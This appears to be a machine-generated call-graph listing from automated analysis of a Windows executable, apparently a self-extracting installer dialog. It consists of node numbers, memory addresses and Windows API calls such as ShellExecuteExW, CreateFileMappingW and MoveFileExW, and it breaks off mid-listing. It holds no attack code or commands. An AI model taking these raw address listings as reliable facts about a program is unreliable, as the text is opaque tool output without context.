7ff7e5ef4c9a FlushFileBuffers 23234->23235 23234->23236 23235->23236 23237 7ff7e5ef4d0e SetFileTime 23236->23237 23237->23165 23239->23178 23241 7ff7e5ef4e44 23240->23241 23242 7ff7e5ef4e4b 23240->23242 23244 7ff7e5f15c30 _handle_error 8 API calls 23241->23244 23243 7ff7e5ef4e55 GetStdHandle 23242->23243 23248 7ff7e5ef4e63 23242->23248 23243->23248 23245 7ff7e5ef4fee 23244->23245 23245->23184 23246 7ff7e5ef4ebe WriteFile 23246->23248 23247 7ff7e5ef4e7e WriteFile 23247->23248 23249 7ff7e5ef4eb4 23247->23249 23248->23241 23248->23246 23248->23247 23251 7ff7e5ef4f56 23248->23251 23259 7ff7e5ef3a18 101 API calls 23248->23259 23249->23247 23249->23248 23252 7ff7e5ef12bc 33 API calls 23251->23252 23253 7ff7e5ef4f85 23252->23253 23260 7ff7e5ef4190 99 API calls _com_raise_error 23253->23260 23259->23248 23289 7ff7e5efe760 23292 7ff7e5efe7c0 SystemTimeToFileTime 23289->23292 23293 7ff7e5efe832 23292->23293 23294 7ff7e5efe8b7 23292->23294 23295 7ff7e5ef6768 9 API calls 23293->23295 23296 7ff7e5f15c30 _handle_error 8 API calls 23294->23296 23297 7ff7e5efe837 23295->23297 23298 7ff7e5efe7bb 23296->23298 23299 7ff7e5efe842 LocalFileTimeToFileTime 23297->23299 23300 7ff7e5efe84e FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 23297->23300 23299->23294 23300->23294 20753 7ff7e5f0ece0 21098 7ff7e5ef215c 20753->21098 20755 7ff7e5f0ed2b 20756 7ff7e5f0ed3f 20755->20756 20757 7ff7e5f0f9e3 20755->20757 20759 7ff7e5f0ed5c 20755->20759 20756->20759 20762 7ff7e5f0ee2b 20756->20762 20763 7ff7e5f0ed4f 20756->20763 21362 7ff7e5f12ee0 20757->21362 21457 7ff7e5f15c30 20759->21457 20766 7ff7e5f0eee1 20762->20766 20771 7ff7e5f0ee45 20762->20771 20764 7ff7e5f0ed57 20763->20764 20765 7ff7e5f0edf9 20763->20765 20764->20759 20776 7ff7e5efaee0 48 API calls 20764->20776 20765->20759 20770 7ff7e5f0ee1b EndDialog 20765->20770 21106 7ff7e5ef1ebc GetDlgItem 20766->21106 20767 7ff7e5f0fa19 20773 7ff7e5f0fa40 GetDlgItem SendMessageW 20767->20773 20774 7ff7e5f0fa25 SendDlgItemMessageW 20767->20774 20768 7ff7e5f0fa0a SendMessageW 20768->20767 20770->20759 20777 7ff7e5efaee0 48 API calls 20771->20777 21381 7ff7e5ef7a28 GetCurrentDirectoryW 20773->21381 20774->20773 20781 7ff7e5f0ed86 20776->20781 20782 7ff7e5f0ee63 SetDlgItemTextW 20777->20782 20779 7ff7e5f0ef01 EndDialog 20959 7ff7e5f0ef2a 20779->20959 20780 7ff7e5f0fa97 GetDlgItem 21391 7ff7e5ef2120 20780->21391 21395 7ff7e5ef1a94 34 API calls _handle_error 20781->21395 20786 7ff7e5f0ee76 20782->20786 20785 7ff7e5f0ef58 GetDlgItem 20790 7ff7e5f0ef9f SetFocus 20785->20790 20791 7ff7e5f0ef72 SendMessageW SendMessageW 20785->20791 20786->20759 20794 7ff7e5f0ee90 GetMessageW 20786->20794 20789 7ff7e5f0ed96 20793 7ff7e5f0edac 20789->20793 21396 7ff7e5ef210c 20789->21396 20795 7ff7e5f0f042 20790->20795 20796 7ff7e5f0efb5 20790->20796 20791->20790 20793->20759 20811 7ff7e5f0feb3 20793->20811 20794->20759 20801 7ff7e5f0eeae IsDialogMessageW 20794->20801 21399 7ff7e5ef2314 20795->21399 21120 7ff7e5efaee0 20796->21120 20797 7ff7e5ef1b70 31 API calls 20797->20759 20801->20786 20806 7ff7e5f0eec3 TranslateMessage DispatchMessageW 20801->20806 20802 7ff7e5f0f815 20807 7ff7e5efaee0 48 API calls 20802->20807 20805 7ff7e5f0f07c 21409 7ff7e5f12ad0 33 API calls 2 library calls 20805->21409 20806->20786 20812 7ff7e5f0f826 SetDlgItemTextW 20807->20812 20808 7ff7e5f0efbf 21127 7ff7e5ef12bc 20808->21127 21466 7ff7e5f1ae94 20811->21466 20816 7ff7e5efaee0 48 API calls 20812->20816 20815 7ff7e5f0f087 20822 7ff7e5efaee0 48 API calls 20815->20822 20817 7ff7e5f0f858 20816->20817 20833 7ff7e5ef12bc 33 API calls 20817->20833 20819 7ff7e5f0feb8 20829 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20819->20829 20825 7ff7e5f0f0a5 20822->20825 20823 7ff7e5f0efe8 21137 7ff7e5f12bf4 20823->21137 21410 7ff7e5efda04 48 API calls 20825->21410 20836 7ff7e5f0febe 20829->20836 20832 7ff7e5f0f0b8 20840 7ff7e5f12bf4 24 API calls 20832->20840 20866 7ff7e5f0f881 20833->20866 20846 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20836->20846 20843 7ff7e5f0f0c8 20840->20843 20856 7ff7e5ef1b70 31 API calls 20843->20856 20844 7ff7e5f0f92a 20850 7ff7e5efaee0 48 API calls 20844->20850 20852 7ff7e5f0fec4 20846->20852 20861 7ff7e5f0f934 20850->20861 20851 7ff7e5f0f038 20859 7ff7e5f0f13c 20851->20859 21411 7ff7e5f13584 33 API calls 2 library calls 20851->21411 20872 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20852->20872 20864 7ff7e5f0f0d6 20856->20864 20869 7ff7e5f0f16a 20859->20869 21412 7ff7e5ef587c 20859->21412 20883 7ff7e5ef12bc 33 API calls 20861->20883 20864->20836 20864->20851 20866->20844 20878 7ff7e5ef12bc 33 API calls 20866->20878 21151 7ff7e5ef552c 20869->21151 20877 7ff7e5f0feca 20872->20877 20888 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20877->20888 20884 7ff7e5f0f8cf 20878->20884 20881 7ff7e5f0f19c 21163 7ff7e5ef8cf8 20881->21163 20882 7ff7e5f0f184 GetLastError 20882->20881 20887 7ff7e5f0f95d 20883->20887 20890 7ff7e5efaee0 48 API calls 20884->20890 20886 7ff7e5f0f15e 21415 7ff7e5f0d908 12 API calls _handle_error 20886->21415 20902 7ff7e5ef12bc 33 API calls 20887->20902 20894 7ff7e5f0fed0 20888->20894 20895 7ff7e5f0f8da 20890->20895 20903 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 20894->20903 21452 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 20895->21452 20898 7ff7e5f0f1ae 20901 7ff7e5f0f1b5 GetLastError 20898->20901 20907 7ff7e5f0f1c4 20898->20907 20901->20907 20908 7ff7e5f0f99e 20902->20908 20909 7ff7e5f0fed6 20903->20909 20904 7ff7e5f0f8f2 21453 7ff7e5ef1c04 20904->21453 20906 7ff7e5f0f26c 20911 7ff7e5f0f27b 20906->20911 20929 7ff7e5f0f6c9 20906->20929 20907->20906 20907->20911 20913 7ff7e5f0f1db GetTickCount 20907->20913 20923 7ff7e5ef1b70 31 API calls 20908->20923 20914 7ff7e5ef215c 61 API calls 20909->20914 20915 7ff7e5f0f5a0 20911->20915 21416 7ff7e5ef7c10 20911->21416 21166 7ff7e5ef5238 20913->21166 20918 7ff7e5f0ff34 20914->20918 20915->20779 21441 7ff7e5ef6e5c 20915->21441 20916 7ff7e5f0f90e 20919 7ff7e5ef1b70 31 API calls 20916->20919 20924 7ff7e5f0ff38 20918->20924 20932 7ff7e5f0ffd9 GetDlgItem SetFocus 20918->20932 20978 7ff7e5f0ff4d 20918->20978 20926 7ff7e5f0f91c 20919->20926 20931 7ff7e5f0f9c8 20923->20931 20940 7ff7e5f15c30 _handle_error 8 API calls 20924->20940 20934 7ff7e5ef1b70 31 API calls 20926->20934 20927 7ff7e5f0f29e 21428 7ff7e5efbc90 131 API calls 20927->21428 20943 7ff7e5efaee0 48 API calls 20929->20943 20939 7ff7e5ef1b70 31 API calls 20931->20939 20936 7ff7e5f1000a 20932->20936 20934->20844 20949 7ff7e5ef12bc 33 API calls 20936->20949 20937 7ff7e5f0f20a 21176 7ff7e5ef1b70 20937->21176 20945 7ff7e5f0f9d3 20939->20945 20946 7ff7e5f105e7 20940->20946 20941 7ff7e5f0f2b8 21429 7ff7e5efda04 48 API calls 20941->21429 20951 7ff7e5f0f6f7 SetDlgItemTextW 20943->20951 20944 7ff7e5f0f5da 20952 7ff7e5efaee0 48 API calls 20944->20952 20953 7ff7e5ef1b70 31 API calls 20945->20953 20956 7ff7e5f1001c 20949->20956 20950 7ff7e5f0f218 21181 7ff7e5ef4334 20950->21181 20957 7ff7e5ef2134 20951->20957 20958 7ff7e5f0f5e7 20952->20958 20953->20959 20954 7ff7e5f0ff84 SendDlgItemMessageW 20960 7ff7e5f0ffad EndDialog 20954->20960 20961 7ff7e5f0ffa4 20954->20961 20955 7ff7e5f0f2fa GetCommandLineW 20962 7ff7e5f0f3b9 20955->20962 20963 7ff7e5f0f39f 20955->20963 21471 7ff7e5ef8e0c 20956->21471 20965 7ff7e5f0f715 SetDlgItemTextW GetDlgItem 20957->20965 21450 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 20958->21450 20959->20797 20960->20924 20961->20960 21434 7ff7e5f0e6a4 33 API calls _handle_error 20962->21434 21430 7ff7e5ef1c80 20963->21430 20970 7ff7e5f0f740 GetWindowLongPtrW SetWindowLongPtrW 20965->20970 20971 7ff7e5f0f763 20965->20971 20970->20971 21201 7ff7e5f109d8 20971->21201 20972 7ff7e5f0f5fa 20977 7ff7e5ef1b70 31 API calls 20972->20977 20973 7ff7e5ef210c SetDlgItemTextW 20980 7ff7e5f10044 20973->20980 20974 7ff7e5f0f3ca 21435 7ff7e5f0e6a4 33 API calls _handle_error 20974->21435 20985 7ff7e5f0f605 20977->20985 20978->20924 20978->20954 20990 7ff7e5f10076 SendDlgItemMessageW FindFirstFileW 20980->20990 20982 7ff7e5f0f254 21197 7ff7e5ef424c 20982->21197 20983 7ff7e5f0f245 GetLastError 20983->20982 20989 7ff7e5ef1b70 31 API calls 20985->20989 20986 7ff7e5f0f3db 21436 7ff7e5f0e6a4 33 API calls _handle_error 20986->21436 20988 7ff7e5f109d8 188 API calls 20993 7ff7e5f0f78c 20988->20993 20994 7ff7e5f0f613 20989->20994 20995 7ff7e5f100cb 20990->20995 21090 7ff7e5f10554 20990->21090 21354 7ff7e5f134c4 20993->21354 21002 7ff7e5efaee0 48 API calls 20994->21002 21006 7ff7e5efaee0 48 API calls 20995->21006 20996 7ff7e5f0f3ec 21437 7ff7e5efbd30 131 API calls 20996->21437 21001 7ff7e5f109d8 188 API calls 21017 7ff7e5f0f7ba 21001->21017 21005 7ff7e5f0f62b 21002->21005 21003 7ff7e5f0f403 21438 7ff7e5f136e0 33 API calls 21003->21438 21004 7ff7e5f105d1 21004->20924 21018 7ff7e5ef12bc 33 API calls 21005->21018 21010 7ff7e5f100ee 21006->21010 21008 7ff7e5f105f9 21012 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21008->21012 21009 7ff7e5f0f7e6 21451 7ff7e5ef1e98 GetDlgItem EnableWindow 21009->21451 21023 7ff7e5ef12bc 33 API calls 21010->21023 21011 7ff7e5f0f422 CreateFileMappingW 21015 7ff7e5f0f461 MapViewOfFile 21011->21015 21016 7ff7e5f0f4a3 ShellExecuteExW 21011->21016 21013 7ff7e5f105fe 21012->21013 21021 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21013->21021 21439 7ff7e5f16e10 21015->21439 21027 7ff7e5f0f4c4 21016->21027 21017->21009 21022 7ff7e5f109d8 188 API calls 21017->21022 21031 7ff7e5f0f654 21018->21031 21019 7ff7e5f0ef45 21019->20779 21019->20802 21024 7ff7e5f10604 21021->21024 21022->21009 21025 7ff7e5f1011d 21023->21025 21030 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21024->21030 21475 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 21025->21475 21028 7ff7e5f0f513 21027->21028 21029 7ff7e5f0f4e6 WaitForInputIdle 21027->21029 21039 7ff7e5f0f52c UnmapViewOfFile CloseHandle 21028->21039 21040 7ff7e5f0f53f 21028->21040 21034 7ff7e5f0f4fb 21029->21034 21035 7ff7e5f1060a 21030->21035 21031->20877 21032 7ff7e5f0f6aa 21031->21032 21036 7ff7e5ef1b70 31 API calls 21032->21036 21033 7ff7e5f10138 21476 7ff7e5ef52c0 21033->21476 21034->21028 21038 7ff7e5f0f501 Sleep 21034->21038 21043 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21035->21043 21036->20779 21038->21028 21038->21034 21039->21040 21040->20852 21042 7ff7e5f0f575 21040->21042 21041 7ff7e5f1014f 21044 7ff7e5ef1b70 31 API calls 21041->21044 21046 7ff7e5ef1b70 31 API calls 21042->21046 21045 7ff7e5f10610 21043->21045 21047 7ff7e5f1015c 21044->21047 21050 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21045->21050 21048 7ff7e5f0f592 21046->21048 21047->21013 21049 7ff7e5ef1b70 31 API calls 21047->21049 21051 7ff7e5ef1b70 31 API calls 21048->21051 21052 7ff7e5f101c3 21049->21052 21053 7ff7e5f10616 21050->21053 21051->20915 21054 7ff7e5ef210c SetDlgItemTextW 21052->21054 21056 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21053->21056 21055 7ff7e5f101d7 FindClose 21054->21055 21057 7ff7e5f102e7 SendDlgItemMessageW 21055->21057 21058 7ff7e5f101f3 21055->21058 21059 7ff7e5f1061c 21056->21059 21061 7ff7e5f1031b 21057->21061 21486 7ff7e5f0de44 10 API calls _handle_error 21058->21486 21064 7ff7e5efaee0 48 API calls 21061->21064 21062 7ff7e5f10216 21063 7ff7e5efaee0 48 API calls 21062->21063 21066 7ff7e5f1021f 21063->21066 21065 7ff7e5f10328 21064->21065 21068 7ff7e5ef12bc 33 API calls 21065->21068 21487 7ff7e5efda04 48 API calls 21066->21487 21069 7ff7e5f10357 21068->21069 21488 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 21069->21488 21070 7ff7e5ef1b70 31 API calls 21073 7ff7e5f102d3 21070->21073 21072 7ff7e5f1023c BuildCatchObjectHelperInternal 21072->21024 21072->21070 21075 7ff7e5ef210c SetDlgItemTextW 21073->21075 21074 7ff7e5f10372 21076 7ff7e5ef52c0 33 API calls 21074->21076 21075->21057 21077 7ff7e5f10389 21076->21077 21078 7ff7e5ef1b70 31 API calls 21077->21078 21079 7ff7e5f10395 BuildCatchObjectHelperInternal 21078->21079 21080 7ff7e5ef1b70 31 API calls 21079->21080 21081 7ff7e5f103cf 21080->21081 21082 7ff7e5ef1b70 31 API calls 21081->21082 21083 7ff7e5f103dc 21082->21083 21083->21035 21084 7ff7e5ef1b70 31 API calls 21083->21084 21085 7ff7e5f10443 21084->21085 21086 7ff7e5ef210c SetDlgItemTextW 21085->21086 21087 7ff7e5f10457 21086->21087 21087->21090 21489 7ff7e5f0de44 10 API calls _handle_error 21087->21489 21089 7ff7e5f10482 21091 7ff7e5efaee0 48 API calls 21089->21091 21090->20924 21090->21004 21090->21008 21090->21053 21092 7ff7e5f1048c 21091->21092 21490 7ff7e5efda04 48 API calls 21092->21490 21094 7ff7e5ef1b70 31 API calls 21096 7ff7e5f10540 21094->21096 21095 7ff7e5f104a9 BuildCatchObjectHelperInternal 21095->21045 21095->21094 21097 7ff7e5ef210c SetDlgItemTextW 21096->21097 21097->21090 21099 7ff7e5ef21d0 21098->21099 21100 7ff7e5ef216a 21098->21100 21099->20755 21100->21099 21491 7ff7e5efa8ac 21100->21491 21102 7ff7e5ef218f 21102->21099 21103 7ff7e5ef21a4 GetDlgItem 21102->21103 21103->21099 21104 7ff7e5ef21b7 21103->21104 21104->21099 21105 7ff7e5ef21be SetWindowTextW 21104->21105 21105->21099 21107 7ff7e5ef1f34 21106->21107 21108 7ff7e5ef1efc 21106->21108 21591 7ff7e5ef1ff8 GetWindowTextLengthW 21107->21591 21111 7ff7e5ef12bc 33 API calls 21108->21111 21110 7ff7e5ef1f2a BuildCatchObjectHelperInternal 21112 7ff7e5ef1b70 31 API calls 21110->21112 21115 7ff7e5ef1f89 21110->21115 21111->21110 21112->21115 21113 7ff7e5ef1fc8 21114 7ff7e5f15c30 _handle_error 8 API calls 21113->21114 21116 7ff7e5ef1fdd 21114->21116 21115->21113 21117 7ff7e5ef1ff0 21115->21117 21116->20779 21116->20785 21116->21019 21118 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21117->21118 21119 7ff7e5ef1ff5 21118->21119 21121 7ff7e5efaef3 21120->21121 21613 7ff7e5ef9b74 21121->21613 21124 7ff7e5efaf86 21124->20808 21125 7ff7e5efaf58 LoadStringW 21125->21124 21126 7ff7e5efaf71 LoadStringW 21125->21126 21126->21124 21128 7ff7e5ef12f0 21127->21128 21135 7ff7e5ef13bb 21127->21135 21130 7ff7e5ef12fe BuildCatchObjectHelperInternal 21128->21130 21132 7ff7e5ef13b6 21128->21132 21134 7ff7e5ef1358 21128->21134 21130->20823 21641 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21132->21641 21134->21130 21632 7ff7e5f15ae0 21134->21632 21642 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21135->21642 21645 7ff7e5f0e96c PeekMessageW 21137->21645 21140 7ff7e5f12c93 SendMessageW SendMessageW 21142 7ff7e5f12cd9 21140->21142 21143 7ff7e5f12cf4 SendMessageW 21140->21143 21141 7ff7e5f12c45 21144 7ff7e5f12c51 ShowWindow SendMessageW SendMessageW 21141->21144 21142->21143 21145 7ff7e5f12d13 21143->21145 21146 7ff7e5f12d16 SendMessageW SendMessageW 21143->21146 21144->21140 21145->21146 21147 7ff7e5f12d68 SendMessageW 21146->21147 21148 7ff7e5f12d43 SendMessageW 21146->21148 21149 7ff7e5f15c30 _handle_error 8 API calls 21147->21149 21148->21147 21150 7ff7e5f0eff5 21149->21150 21150->20819 21150->20851 21152 7ff7e5ef5671 21151->21152 21159 7ff7e5ef5562 21151->21159 21153 7ff7e5f15c30 _handle_error 8 API calls 21152->21153 21154 7ff7e5ef5687 21153->21154 21154->20881 21154->20882 21155 7ff7e5ef564b 21155->21152 21156 7ff7e5ef5c60 56 API calls 21155->21156 21156->21152 21157 7ff7e5ef12bc 33 API calls 21157->21159 21159->21155 21159->21157 21160 7ff7e5ef569c 21159->21160 21650 7ff7e5ef5c60 21159->21650 21161 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21160->21161 21162 7ff7e5ef56a1 21161->21162 21164 7ff7e5ef8d06 SetCurrentDirectoryW 21163->21164 21165 7ff7e5ef8d03 21163->21165 21164->20898 21165->21164 21167 7ff7e5ef5265 21166->21167 21168 7ff7e5ef527a 21167->21168 21169 7ff7e5ef12bc 33 API calls 21167->21169 21170 7ff7e5f15c30 _handle_error 8 API calls 21168->21170 21169->21168 21171 7ff7e5ef52b1 21170->21171 21172 7ff7e5f0d1bc 21171->21172 21173 7ff7e5f0d1e3 21172->21173 21796 7ff7e5ef60e0 21173->21796 21175 7ff7e5f0d1f3 BuildCatchObjectHelperInternal 21175->20937 21177 7ff7e5ef1b83 21176->21177 21178 7ff7e5ef1bac 21176->21178 21177->21178 21179 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21177->21179 21178->20950 21180 7ff7e5ef1bd0 21179->21180 21184 7ff7e5ef436a 21181->21184 21182 7ff7e5ef439e 21185 7ff7e5ef80b0 49 API calls 21182->21185 21187 7ff7e5ef447f 21182->21187 21183 7ff7e5ef43b1 CreateFileW 21183->21182 21184->21182 21184->21183 21188 7ff7e5ef4409 21185->21188 21186 7ff7e5ef44af 21189 7ff7e5f15c30 _handle_error 8 API calls 21186->21189 21187->21186 21192 7ff7e5ef1c80 33 API calls 21187->21192 21190 7ff7e5ef4446 21188->21190 21191 7ff7e5ef440d CreateFileW 21188->21191 21193 7ff7e5ef44c4 21189->21193 21190->21187 21194 7ff7e5ef44d8 21190->21194 21191->21190 21192->21186 21193->20982 21193->20983 21195 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21194->21195 21196 7ff7e5ef44dd 21195->21196 21198 7ff7e5ef4272 21197->21198 21199 7ff7e5ef4266 21197->21199 21199->21198 21805 7ff7e5ef42d0 21199->21805 21812 7ff7e5f0e558 21201->21812 21203 7ff7e5f10d3e 21204 7ff7e5ef1b70 31 API calls 21203->21204 21205 7ff7e5f10d47 21204->21205 21206 7ff7e5f15c30 _handle_error 8 API calls 21205->21206 21208 7ff7e5f0f77b 21206->21208 21207 7ff7e5efd124 33 API calls 21353 7ff7e5f10a53 BuildCatchObjectHelperInternal 21207->21353 21208->20988 21209 7ff7e5f12a4a 21926 7ff7e5ef353c 47 API calls 21209->21926 21212 7ff7e5f12a50 21927 7ff7e5ef353c 47 API calls 21212->21927 21215 7ff7e5f12a3e 21217 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21215->21217 21216 7ff7e5f12a56 21219 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21216->21219 21218 7ff7e5f12a44 21217->21218 21925 7ff7e5ef353c 47 API calls 21218->21925 21220 7ff7e5f12a5c 21219->21220 21223 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21220->21223 21224 7ff7e5f12a62 21223->21224 21229 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21224->21229 21225 7ff7e5f1299a 21226 7ff7e5f12a22 21225->21226 21230 7ff7e5ef1c80 33 API calls 21225->21230 21923 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21226->21923 21227 7ff7e5ef13c4 33 API calls 21233 7ff7e5f1178a GetTempPathW 21227->21233 21228 7ff7e5f12a38 21924 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21228->21924 21234 7ff7e5f12a68 21229->21234 21232 7ff7e5f129c7 21230->21232 21922 7ff7e5f0e738 33 API calls 3 library calls 21232->21922 21233->21353 21240 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21234->21240 21235 7ff7e5ef7a28 35 API calls 21235->21353 21239 7ff7e5f129dd 21247 7ff7e5ef1b70 31 API calls 21239->21247 21250 7ff7e5f129f4 BuildCatchObjectHelperInternal 21239->21250 21245 7ff7e5f12a6e 21240->21245 21241 7ff7e5ef2120 SetWindowTextW 21241->21353 21244 7ff7e5f1f094 43 API calls 21244->21353 21251 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21245->21251 21246 7ff7e5f12343 21246->21226 21246->21228 21249 7ff7e5f15ae0 4 API calls 21246->21249 21261 7ff7e5f1238b BuildCatchObjectHelperInternal 21246->21261 21247->21250 21248 7ff7e5ef1b70 31 API calls 21248->21226 21249->21261 21250->21248 21253 7ff7e5f12a74 21251->21253 21252 7ff7e5f0e558 33 API calls 21252->21353 21260 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21253->21260 21255 7ff7e5f12abc 21930 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21255->21930 21256 7ff7e5ef62f0 54 API calls 21256->21353 21258 7ff7e5ef1b70 31 API calls 21258->21225 21259 7ff7e5f12ac8 21932 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 21259->21932 21265 7ff7e5f12a7a 21260->21265 21267 7ff7e5ef1c80 33 API calls 21261->21267 21309 7ff7e5f126df 21261->21309 21262 7ff7e5f12ac2 21931 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21262->21931 21263 7ff7e5ef1c80 33 API calls 21345 7ff7e5f10fd9 21263->21345 21273 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21265->21273 21266 7ff7e5f12ab6 21929 7ff7e5ef1b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21266->21929 21274 7ff7e5f124b3 21267->21274 21270 7ff7e5ef12bc 33 API calls 21270->21353 21271 7ff7e5ef6dd8 33 API calls 21271->21353 21272 7ff7e5f1277a 21272->21255 21272->21266 21284 7ff7e5f127c2 BuildCatchObjectHelperInternal 21272->21284 21290 7ff7e5f15ae0 4 API calls 21272->21290 21294 7ff7e5f1288b BuildCatchObjectHelperInternal 21272->21294 21281 7ff7e5f12a80 21273->21281 21282 7ff7e5f12ab0 21274->21282 21289 7ff7e5ef12bc 33 API calls 21274->21289 21276 7ff7e5ef1b70 31 API calls 21276->21353 21278 7ff7e5f12890 21278->21259 21278->21262 21278->21294 21299 7ff7e5f15ae0 4 API calls 21278->21299 21280 7ff7e5ef52c0 33 API calls 21280->21353 21295 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21281->21295 21928 7ff7e5ef353c 47 API calls 21282->21928 21283 7ff7e5ef5ff4 51 API calls 21283->21353 21817 7ff7e5f13030 21284->21817 21286 7ff7e5f11139 GetDlgItem 21292 7ff7e5ef2120 SetWindowTextW 21286->21292 21288 7ff7e5f0d6d8 31 API calls 21288->21353 21296 7ff7e5f124f6 21289->21296 21290->21284 21297 7ff7e5f11158 SendMessageW 21292->21297 21294->21258 21300 7ff7e5f12a86 21295->21300 21918 7ff7e5efd124 21296->21918 21297->21345 21298 7ff7e5efdb98 33 API calls 21298->21353 21299->21294 21306 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21300->21306 21303 7ff7e5ef72ac 53 API calls 21303->21353 21304 7ff7e5ef5890 51 API calls 21304->21353 21305 7ff7e5ef2274 31 API calls 21305->21353 21308 7ff7e5f12a8c 21306->21308 21307 7ff7e5f1118c SendMessageW 21307->21345 21313 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21308->21313 21309->21272 21309->21278 21315 7ff7e5f12aa4 21309->21315 21317 7ff7e5f12aaa 21309->21317 21316 7ff7e5f12a92 21313->21316 21318 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21315->21318 21323 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21316->21323 21322 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21317->21322 21318->21317 21319 7ff7e5ef5238 33 API calls 21319->21353 21320 7ff7e5f114ae SHFileOperationW 21320->21353 21322->21282 21325 7ff7e5f12a98 21323->21325 21324 7ff7e5ef587c 51 API calls 21324->21353 21327 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21325->21327 21326 7ff7e5ef71f4 33 API calls 21326->21353 21329 7ff7e5f12a9e 21327->21329 21328 7ff7e5ef210c SetDlgItemTextW 21328->21353 21333 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 21329->21333 21333->21315 21334 7ff7e5f00aa0 CompareStringW 21342 7ff7e5f12521 21334->21342 21336 7ff7e5ef1b70 31 API calls 21336->21342 21338 7ff7e5ef12bc 33 API calls 21338->21342 21340 7ff7e5f11ae9 EndDialog 21340->21353 21342->21309 21342->21325 21342->21329 21342->21334 21342->21336 21342->21338 21343 7ff7e5efd124 33 API calls 21342->21343 21343->21342 21344 7ff7e5f11671 MoveFileW 21344->21345 21346 7ff7e5f116a5 MoveFileExW 21344->21346 21345->21216 21345->21263 21345->21307 21347 7ff7e5ef1b70 31 API calls 21345->21347 21345->21353 21859 7ff7e5ef8ebc 47 API calls BuildCatchObjectHelperInternal 21345->21859 21862 7ff7e5ef2274 31 API calls _invalid_parameter_noinfo_noreturn 21345->21862 21863 7ff7e5f0df84 145 API calls 2 library calls 21345->21863 21346->21345 21347->21345 21348 7ff7e5ef552c 56 API calls 21348->21353 21349 7ff7e5ef1c80 33 API calls 21349->21353 21350 7ff7e5ef1c04 33 API calls 21350->21353 21352 7ff7e5ef2314 33 API calls 21352->21353 21353->21203 21353->21207 21353->21209 21353->21212 21353->21215 21353->21218 21353->21220 21353->21224 21353->21225 21353->21227 21353->21234 21353->21235 21353->21241 21353->21244 21353->21245 21353->21246 21353->21252 21353->21253 21353->21256 21353->21265 21353->21270 21353->21271 21353->21276 21353->21280 21353->21281 21353->21283 21353->21288 21353->21298 21353->21300 21353->21303 21353->21304 21353->21305 21353->21308 21353->21316 21353->21319 21353->21320 21353->21324 21353->21326 21353->21328 21353->21340 21353->21344 21353->21345 21353->21348 21353->21349 21353->21350 21353->21352 21816 7ff7e5f00aa0 CompareStringW 21353->21816 21856 7ff7e5efce9c 35 API calls _invalid_parameter_noinfo_noreturn 21353->21856 21857 7ff7e5f0d26c 33 API calls Concurrency::cancel_current_task 21353->21857 21858 7ff7e5f13f3c 31 API calls _invalid_parameter_noinfo_noreturn 21353->21858 21860 7ff7e5f0e384 33 API calls _invalid_parameter_noinfo_noreturn 21353->21860 21861 7ff7e5f0d154 33 API calls 21353->21861 21864 7ff7e5f0e738 33 API calls 3 library calls 21353->21864 21865 7ff7e5ef88f8 21353->21865 21881 7ff7e5ef6448 33 API calls 21353->21881 21882 7ff7e5ef7d6c 33 API calls 3 library calls 21353->21882 21883 7ff7e5ef885c 21353->21883 21887 7ff7e5ef1734 33 API calls 4 library calls 21353->21887 21888 7ff7e5ef5790 21353->21888 21902 7ff7e5ef1170 33 API calls BuildCatchObjectHelperInternal 21353->21902 21903 7ff7e5ef6260 FindClose 21353->21903 21904 7ff7e5f00ad0 CompareStringW 21353->21904 21905 7ff7e5f0d848 47 API calls 21353->21905 21906 7ff7e5f0c414 51 API calls 3 library calls 21353->21906 21907 